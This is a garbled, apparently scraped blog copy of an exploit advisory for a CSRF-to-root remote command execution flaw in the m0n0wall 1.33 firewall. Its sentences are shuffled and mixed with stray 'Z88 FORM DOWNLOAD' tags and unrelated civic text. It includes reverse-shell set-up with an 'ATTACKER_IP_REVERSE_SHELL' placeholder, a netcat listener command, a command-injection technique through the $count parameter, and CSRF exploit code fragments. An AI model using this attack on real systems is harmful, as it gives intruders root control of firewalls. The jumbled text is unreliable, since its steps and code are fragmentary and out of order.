Then, rename php-reverse-shell.php to psr.txt and host it on a accessible web server. $port = PORT_IN_LISTENING_MODE // CHANGE THIS $ip = 'ATTACKER_IP_REVERSE_SHELL' // CHANGE THIS #Z88 FORM DOWNLOAD DOWNLOAD#You need to download php-reverse-shell here ! HTTP URL to download php-reverse-shell.txt (admin hash is in the /config/config.xml file on m0n0wall, and WebGUI access is checked with /usr/local/www/.htpasswd) Nc -l -vv -p 1337 # Netcat listener, to gain shell control. To obtain the reverseshell, attacker must place a netcat in listening mode. The attacker must know the URL address of m0n0wall WebGui. M0n0wall 1.33, the latest firewall/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell. If ((intval($_POST) MAX_COUNT)) setTimeout('redirect(\"" target "x.php\")',1000) " ĭocument.getElementById("resultjs").value = resultjs ĬSRF m0n0wall 1.33 to root RCE (reverse shell) You should sanitize this $count variable like : So, if an attacker prepend his injection command with a number between 1 and 10, $count is set. This variable is defined on line 55 :īut this variable is set only if line 47 is false : The remote command execution through CSRF target the $count variable. #Z88 FORM DOWNLOAD UPDATE#It is strongly advised to update to version 1.34 available now.ĬSRF exploit to reset WebGUI admin password to admin/mono (with command execution) :ĬSRF exploit to execute arbitrary command on server :įile /usr/local/escapeshellarg($host)) ġ61 : system("/sbin/$pingprog -c$count ". In version 1.33 of the distribution, differents vulnerabilities CSRF RCE reverse root shell can be used. M0n0wall is probably the first UNIX system that has its boot-time configuration done with PHP, rather than the usual shell scripts, and that has the entire system configuration stored in XML format. The entire system configuration is stored in one single XML text file to keep things transparent. M0n0wall is based on a bare-bones version of FreeBSD, along with a web server, PHP and a few other utilities. #Z88 FORM DOWNLOAD SOFTWARE#M0n0wall is a project aimed at creating a complete, embedded firewall software package that, when used together with an embedded PC, provides all the important features of commercial firewall boxes (including ease of use) at a fraction of the price (free software). M0n0wall firewall/router distribution description : # Vendor or Software Link: m0n0.ch - m0n0.ch/wall/downloads.php Application for Appointment to a Committee, Board or Commission.Community Services, Initiatives
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |